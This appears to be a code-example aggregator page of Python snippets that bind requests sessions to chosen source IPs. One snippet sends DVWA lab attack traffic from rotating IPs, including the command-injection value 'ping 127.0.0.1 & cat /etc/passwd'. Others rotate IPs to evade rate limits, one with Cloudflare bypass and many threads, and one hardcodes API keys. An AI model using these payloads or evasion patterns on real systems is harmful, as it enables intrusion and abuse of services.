Ejemplo n.º 1
0
def GetExternalIP():
    externalIPURL = 'https://api.ipify.org/?format=json'
    if configs['INTERNAL_IP'] and configs['CF_TYPE'] and configs['CF_NAME']:
        ip = int()
        try:
            response = requests.Session()
            inetface = source.SourceAddressAdapter(configs['INTERNAL_IP'])
            response.mount('http://', inetface)
            response.mount('https://', inetface)
            rSession = response.get(externalIPURL)
            response.close()
            ip = rSession.json()['ip']
        except urllib3.exceptions.ProtocolError as de:
            retry_error = True
            print("[IPTOCF] urllib3 ERROR: {}".format(de))
        except requests.exceptions.ConnectionError as ce:
            retry_error = True
            print("[IPTOCF] requests ERROR: {}".format(ce))
        except TypeError as t:
            print("[IPTOCF] TypeError ERROR: {}".format(t))
        except AssertionError as a:
            print("[IPTOCF] AssertionError ERROR: {}".format(a))
        cfjson = {
            'type': configs['CF_TYPE'],
            'name': configs['CF_NAME'],
            'content': ip,
            'proxied': True
        }
    return cfjson
Ejemplo n.º 2
0
def initial_requests_session(ip,
                             header=None,
                             proxy=None,
                             user='******',
                             password='******',
                             verify=False,
                             auth=None,
                             retries=1):
    s = requests.Session()
    #new_adapter = source.SourceAddressAdapter(ip,max_retries=retries)
    new_adapter = source.SourceAddressAdapter(ip)  #,max_retries=retries)
    s.mount('http://', new_adapter)
    s.mount('https://', new_adapter)
    #s.auth = ('user', 'pass')
    #s.auth = HttpNtlmAuth(user,password)
    s.headers = {'User-Agent': 'zrequest-v1.1'}
    #s.headers.update({'via': 'aswg33-1'})
    s.proxies = {
        'http': 'http://172.17.33.23:8080',
        'https': 'http://172.17.33.23:8080'
    }
    #s.verify = False
    s.verify = 'rootCA.cer'
    r = s.get('https://www.baidu.com')
    r = s.get("http://ntlm_protected_site.com")
    print(r.text)
    return s
Ejemplo n.º 3
0
 def create_session(self):
     # 构建出口IP
     out_sourse = source.SourceAddressAdapter(random.choice(self.ip_list))
     # 创建HTTP会话
     session = requests.session()
     # 指定会话的出口
     session.mount('http://', out_sourse)
     session.mount('https://', out_sourse)
     return session
Ejemplo n.º 4
0
    def __init__(self, source_address: str=None):
        Session.__init__(self)
        self.logger = create_logger('UpbitAPIClient')

        if source_address:
            self.logger.info("mounted at source address: %s" % source_address)
            new_source = source.SourceAddressAdapter(source_address)
            self.mount('http://', new_source)
            self.mount('https://', new_source)
Ejemplo n.º 5
0
 def matches_result(self, request):
     req = request['req']
     try:
         res = req.result()
     except (requests.ConnectionError, requests.Timeout,
             socket.timeout) as e:
         return self.retry_request(request)
     if (res.status_code != 200):
         if (res.status_code == 404 and request['req_type'] == 6):
             #not found
             return None
         self.session = FuturesSession()
         # if last IP cycle through data sources
         if self.ip_num == len(self.ips) - 1:
             if request['req_type'] == 4 or request['req_type'] == 6:
                 request['req_type'] = (4 if
                                        (request['req_type'] == 6) else 6)
                 self.data_source = request['req_type']
         self.ip_num = (request['ip_num'] + 1) % len(self.ips)
         self.session.mount(
             'http://', source.SourceAddressAdapter(self.ips[self.ip_num]))
         return self.retry_request(request, sleep=1)
     if request['req_type'] == 4:
         return self.parse_skill(res)
     if request['req_type'] == 5:
         return self.parse_dota_max(res)
     if request['req_type'] == 6:
         #switch IPs and wait 0.5 seconds so that it is 1 request per second per IP
         time.sleep(1 / len(self.ips))
         self.ip_num = (request['ip_num'] + 1) % len(self.ips)
         self.session.mount(
             'http://', source.SourceAddressAdapter(self.ips[self.ip_num]))
         return self.parse_opendota_skill(res)
     try:
         matches = res.json()['result']['matches']
     except:
         if (request['req_type'] == 3):
             return []
         return self.retry_request(request)
     if len(matches) == 0:
         return self.retry_request(request)
     return matches
Ejemplo n.º 6
0
    def __init__(self, use_ip: str = None):
        self.session = InstabotSession()
        if use_ip is not None:
            new_ip = source.SourceAddressAdapter(use_ip)
            self.session.mount('http://', new_ip)
            self.session.mount('https://', new_ip)

        self.external_ip_address = self._get_external_ip_address()

        self._set_default_cookies()
        self._set_default_headers()
Ejemplo n.º 7
0
 def send_packet(self,methods,*args):
     for ip,url,header,data in args:
         new_source = source.SourceAddressAdapter(ip) ;#选择网卡信息,即绑定源IP地址
         self.s.mount('http://', new_source)  #设置http请求与套接字绑定
         self.s.mount('https://', new_source)
         if not url.startswith("http"):
             url="http://"+url
         if methods == "get":
             self.get_response[ip]=self.s.get(url,headers=header,timeout=60)  
             #把请求结果存放到responses列表中
         else:
             self.post_response[ip]=self.s.post(url,headers=header,data=data,timeout=60)
Ejemplo n.º 8
0
def get_session(bind_ip_="", need_tor_=False):
    try:
        session = requests.Session()
        if need_tor_:
            session.proxies = {
                'http': 'socks5://127.0.0.1:9051',
                'https': 'socks5://127.0.0.1:9051'
            }
        if bind_ip_ != "":
            new_source = source.SourceAddressAdapter(bind_ip_)
            session.mount('http://', new_source)
            session.mount('https://', new_source)
        return session
    except Exception as e:
        logger.critical("Cant get new session for IP: " + str(bind_ip_) +
                        "; " + str(e))
Ejemplo n.º 9
0
Archivo: http.py Proyecto: xfnw/bitbot
    def _wrap() -> Response:
        headers = request_obj.get_headers()

        redirect = 0
        current_url = request_obj.url
        session = requests.Session()
        if not request_obj.bindhost is None:
            new_source = source.SourceAddressAdapter(request_obj.bindhost)
            session.mount('http://', new_source)
            session.mount('https://', new_source)

        while True:
            if request_obj.check_hostname:
                _assert_allowed(current_url)

            response = session.request(request_obj.method,
                                       current_url,
                                       headers=headers,
                                       params=request_obj.get_params,
                                       data=request_obj.get_body(),
                                       allow_redirects=False,
                                       stream=True,
                                       cookies=request_obj.cookies)

            if response.status_code in [301, 302]:
                redirect += 1
                if redirect == 5:
                    raise TooManyRedirectionsError(f"{redirect} redirects")
                else:
                    current_url = response.headers["location"]
                    continue

            response_content = response.raw.read(RESPONSE_MAX,
                                                 decode_content=True)
            if not response.raw.read(1) == b"":
                raise ValueError("Response too large")
            break

        session.close()

        headers = utils.CaseInsensitiveDict(dict(response.headers))
        our_response = Response(response.status_code,
                                response_content,
                                encoding=response.encoding,
                                headers=headers,
                                cookies=response.cookies.get_dict())
        return our_response
Ejemplo n.º 10
0
def cert_from_crt(crt_id, req_session, src_address):
    """
    Get cert, pem and response code from crt id
    """
    if DEBUG_MODE:
        log(f'Getting cert for crt id {crt_id} with source IP ' + src_address)
    new_source = source.SourceAddressAdapter(src_address)
    url = CRT_URL + str(crt_id)
    req_session.mount('https://', new_source)
    response = req_session.get(url)
    txt = response.text # pem
    error = response.status_code
    try:
        der_bytes = pem.unarmor(txt.encode('utf-8'))[2]
        cert = x509.Certificate.load(der_bytes)
    except:
        if DEBUG_MODE:
            log(f'Could not get certificate for crt id {crt_id}: error {error}',
                mode='error')
        return None, None, None
    return cert, txt, response.status_code
Ejemplo n.º 11
0
def save_img(url, file_name):
   '''保存图片'''
    dir = os.path.dirname(file_name)
    if not os.path.exists(dir):
        os.makedirs(dir)
    bind_ip = random.choice(local_ips)  # 从本地网卡地址中随机选取一个绑定
    new_src = source.SourceAddressAdapter(bind_ip)
    s.mount('http://', new_src)
    s.mount('https://', new_src)
    pname = current_process().name   # 获取进程名
    logger.info('进程:{0} 开始下载-->{1} 流量出口->【{2}】'.format(pname, url, bind_ip))
    res = s.get(url)
    if res.status_code != 200:
        logger.info('进程:{0} 下载失败-->{1}, code:{2}'.format(pname, url, res.status_code))
    file_tmp = file_name + '_tmp'
    with open(file_tmp, 'wb') as f:
        f.write(res.content)
        try:
            size = os.path.getsize(file_tmp)
            if size > 10000:    # 判断文件完整性
                os.rename(file_tmp, file_name)
        except Exception as e:
            logging.error('保存失败-->', url)
    logger.info('进程:{0} 下载完成-->{1}'.format(pname, file_name))
Ejemplo n.º 12
0
r = requests.get(dvwa_login_url, auth=(dvwa_username, dvwa_password))
dvwa_cookie = r.cookies

print("DVWA Cookie")
print dvwa_cookie

print("DVWA Header")
print r.headers

counter = 0
#r1.headers = {url1, 'user-agent': ua1, ''}
while 1:
    # Attack Only traffic
    if counter >= 100:
        s1 = requests.Session()
        ip1 = source.SourceAddressAdapter(random.choice(IP_ADDR))
        s1.mount("http://", ip1)
        s1.mount("https://", ip1)
        cur_url = random.choice(attack_url)
        if cur_url == url5:
            try:
                r1 = s1.post(cur_url,
                             headers={'user-agent': random.choice(ua)},
                             cookies=dvwa_cookie,
                             data={
                                 "ip": "ping 127.0.0.1 & cat /etc/passwd",
                                 "Submit": "Submit"
                             })
                if r1.status_code == 200:
                    print("Command execution detected")
                elif r1.status_code == 403:
Ejemplo n.º 13
0
class Dota_API():
    api_keys = [
        'FE70CE9FC0D6D99279498CE852587F59', '2FEC67172AAC0C393EC209A225A7E51E'
    ]
    api_key_num = 1
    api_key = api_keys[api_key_num]

    ips = ['162.213.199.143', '162.213.199.31']
    ip_num = 0

    data_source = 4

    headers = {'User-Agent': 'Script by Grue'}

    errors = 0

    session = FuturesSession()
    session.mount('http://', source.SourceAddressAdapter(ips[ip_num]))

    def matches_get(self, req_type=1, n_id='', **kwargs):
        if (req_type < 4):
            url = 'https://api.steampowered.com/IDOTA2Match_570/'
            url += 'GetMatchHistoryBySequenceNum' if req_type == 1 else 'GetMatchHistory'
            url += '/V001/?key=' + self.api_key + '&min_players=10&'
            if (req_type == 1):
                url += 'start_at_match_seq_num'
            elif (req_type == 2):
                url += 'start_at_match_id'
            elif (req_type == 3):
                url += 'account_id'
            url += '=' + str(n_id)
            if req_type != 1:
                url += '&skill=3'
        elif req_type == 4:
            url = 'http://www.dotabuff.com/matches/' + str(n_id)
        elif req_type == 5:
            url = 'http://dotamax.com/match/detail/' + str(n_id)
        elif req_type == 6:
            url = 'http://api.opendota.com/api/matches/' + str(n_id)
        return dict(req=self.session.get(url, timeout=7, headers=self.headers),
                    req_type=req_type,
                    n_id=n_id,
                    url=url,
                    ip_num=self.ip_num)

    def matches_result(self, request):
        req = request['req']
        try:
            res = req.result()
        except (requests.ConnectionError, requests.Timeout,
                socket.timeout) as e:
            return self.retry_request(request)
        if (res.status_code != 200):
            if (res.status_code == 404 and request['req_type'] == 6):
                #not found
                return None
            self.session = FuturesSession()
            # if last IP cycle through data sources
            if self.ip_num == len(self.ips) - 1:
                if request['req_type'] == 4 or request['req_type'] == 6:
                    request['req_type'] = (4 if
                                           (request['req_type'] == 6) else 6)
                    self.data_source = request['req_type']
            self.ip_num = (request['ip_num'] + 1) % len(self.ips)
            self.session.mount(
                'http://', source.SourceAddressAdapter(self.ips[self.ip_num]))
            return self.retry_request(request, sleep=1)
        if request['req_type'] == 4:
            return self.parse_skill(res)
        if request['req_type'] == 5:
            return self.parse_dota_max(res)
        if request['req_type'] == 6:
            #switch IPs and wait 0.5 seconds so that it is 1 request per second per IP
            time.sleep(1 / len(self.ips))
            self.ip_num = (request['ip_num'] + 1) % len(self.ips)
            self.session.mount(
                'http://', source.SourceAddressAdapter(self.ips[self.ip_num]))
            return self.parse_opendota_skill(res)
        try:
            matches = res.json()['result']['matches']
        except:
            if (request['req_type'] == 3):
                return []
            return self.retry_request(request)
        if len(matches) == 0:
            return self.retry_request(request)
        return matches

    def retry_request(self, request, sleep=7):
        #print(request)
        self.errors += 1
        time.sleep(sleep)
        return self.matches_result(self.matches_get(**request))

    def parse_skill(self, response):
        html = response.text
        end_index = html.find(' Skill</dd>')
        if end_index > -1:
            html = html[:end_index]
        else:
            return None
        start_index = html.rfind('<dd>')
        if start_index > -1:
            html = html[start_index + 4:]
        else:
            return None
        return html

    def parse_dota_max(self, response):
        html = response.text
        html_split = html.split('<td><font style="color: #f0a868;">')
        if len(html_split) > 1:
            html = html_split[1]
        else:
            return None
        html_split = html.split('</font></td>')
        if len(html_split) > 1:
            html = html_split[0]
        else:
            return None
        return html

    def parse_opendota_skill(self, response):
        m = response.json()
        if 'skill' not in m:
            return None
        if m['skill'] == 3:
            return 'Very High'
        return m['skill']
Ejemplo n.º 14
0
def gen_session(ip):
    s = requests.Session()
    new_source = source.SourceAddressAdapter(ip)
    s.mount('http://', new_source)
    s.mount('https://', new_source)
    return s
Ejemplo n.º 15
0
except:
    print "Invalid ip address"
    sys.exit(0)

try:
    no_of_ip = int(sys.argv[2])
except:
    print "Invalid 2nd Argv"
    sys.exit(0)
iplist = []
for i in range(0, no_of_ip):
    iplist.append(ip_bits[0] + '.' + ip_bits[1] + '.' + ip_bits[2] + '.' +
                  str(host_bit + i))

for (x, source_ip) in enumerate(iplist):

    scraper = cfscrape.create_scraper()  # returns a CloudflareScraper instance
    # Or: scraper = cfscrape.CloudflareScraper()  # CloudflareScraper inherits from requests.Session
    new_source = source.SourceAddressAdapter(source_ip)
    scraper.mount('http://', new_source)
    scraper.mount('https://', new_source)
    print scraper.get("http://tamilrockers.lv").request.headers

    session = requests.session()
    scraper1 = cfscrape.create_scraper(sess=session)
    scraper1.mount('http://', new_source)
    scraper1.mount('https://', new_source)
    for i in range(int(sys.argv[3])):
        t2 = threading.Thread(target=process, args=(scraper1, source_ip))
        t2.start()
Ejemplo n.º 16
0
                        type=int, default=10000)
    parser.add_argument('-t', '--threads', help="Number of parallel threads to send queries from", type=int, default=25)
    args = parser.parse_args()

    domains = args.domains.readlines()
    resolvers = args.resolvers.readlines()

    logging.basicConfig(level=logging.WARNING, filename=f"{args.output}.log", filemode='w',
                        format="%(asctime)s:  %(message)s")
    reader = PktReader(write_mode='file', out_file=f"{args.output}.pcap",
                       pkt_filter=f'host {args.ip} and tcp port 443', interface="ens33", unique_out_file_name=False)
    reader.start()

    # send traffic out specified IP for filtering
    session = requests.Session()
    s = source.SourceAddressAdapter(args.ip)
    session.mount('http://', s)
    session.mount('https://', s)

    queries = []

    print("Generating queries...")
    for i in range(args.num_samples):
        web_args = {"num": i, "type": "web", "domain": random.choice(domains).strip(), "resolver": ""}
        doh_args = {"num": i, "type": "doh", "domain": random.choice(domains).strip(),
                    "resolver": random.choice(resolvers).strip()}
        if random.random() < 0.5:
            queries.append(web_args)
            queries.append(doh_args)
        else:
            queries.append(doh_args)
Ejemplo n.º 17
0
def simulate(request, robotid=None, action=None, tray=None, line=None):
    """
    Simulates a robot sending movements.
    It is intended for testing the behaviour of the application when
    a protocol running on a robot notfies sample moves to the system.
    It uses the current session as storage.
    For this to work, robots MUST (RFC 2119) be "virtual" ones,
    i.e. they should have IP addresses that are valid only in the server
    that is executing the movement simulation.
    The tested approach creates a virtual network interface and adds
    private IPv6 addresses (ff00/8) for each robot on it. This requires
    that the server also has an IPv6 address (could also be added on the
    virtual interface).
    """

    import json

    robots = Robot.objects.all()
    # Start of simulation
    if request.method == 'GET' and not robotid:
        return render(request, 'tracing/simulate.html', {'robots': robots})

    # Robot selection
    if request.method == 'POST' and not robotid:
        robotid = request.POST.get('robotid', None)
        if not robotid:
            return HttpResponseRedirect(reverse('tracing:simulate'))
        return HttpResponseRedirect(
            reverse('tracing:simulate', kwargs={'robotid': robotid}))

    # We are acting on a certain robot, there MUST (RFC2119) be a robotid
    # If there is no id for the robot, this smells fishy
    if not robotid: return HttpResponseForbidden()

    # Only GET or POST accepted here
    if not request.method in ['GET', 'POST']: return HttpResponseForbidden()

    # Simulation for a given robot, so we need to load the robot proper
    # Robot should exist, but ...
    robot = get_object_or_404(Robot, id=robotid)
    # Do we have work for this robot?
    moves = request.session.get('simmov{}'.format(robot.id), '[]')
    moves = json.loads(moves)
    # Get the trays and racks for displaying
    trays = []
    grids = {}
    for rack in robot.rack_set.all():
        trays.append(rack.position)
        grids[rack.position] = populate(rack)

    # No action requested, present the robot
    if not action:
        return render(
            request, 'tracing/simulate.html', {
                'robots': robots,
                'robot': robot,
                'trays': trays,
                'grids': grids,
                'moves': moves
            })

    # Add move
    if action == 'a':
        # Get data from "movement" form
        move = {'source': {}, 'destination': {}}
        move['source']['tray'] = request.POST.get('stray', False)
        move['source']['row'] = request.POST.get('srow', False)
        move['source']['col'] = request.POST.get('scol', False)
        move['destination']['tray'] = request.POST.get('dtray', False)
        move['destination']['row'] = request.POST.get('drow', False)
        move['destination']['col'] = request.POST.get('dcol', False)
        if (not move['source']['tray'] or not move['source']['row']
                or not move['source']['col'] or not move['destination']['tray']
                or not move['destination']['row']
                or not move['destination']['col']):
            messages.error(request, _('Movement information was incorrect'))
        else:
            moves.append(move)

    # Clear pending movements
    if action == 'c': moves = []

    # Execute pending moves
    if action == 'm':
        # This is the only place where we need requests
        import requests
        # We need to change the source address
        from requests_toolbelt.adapters import source
        # We need a session
        s = requests.Session()
        # No proxies needed
        s.trust_env = False
        # We use our own server name, from the authorized names in the list
        # but avoiding localhost, it has to be routeable somehow.
        for name in settings.ALLOWED_HOSTS:
            if not name in ['127.0.0.1', '::1', 'localhost']: break

        s.mount('http://{}'.format(name),
                source.SourceAddressAdapter(robot.ip))
        u = 'http://{}{}{}'.format(name,
                                   request.path.replace(request.path_info, ''),
                                   reverse('tracing:movesample'))
        r = s.post(u, json=moves)
        if not r.status_code == 200:
            # Something went wrong
            messages.error(request, _('Moves failed: {}').format(r.reason))
        else:
            # Clear the moves
            moves = []

    # Finally, we update the session and re-paint the robot
    request.session['simmov{}'.format(robot.id)] = json.dumps(moves)
    return HttpResponseRedirect(
        reverse('tracing:simulate', kwargs={'robotid': robotid}))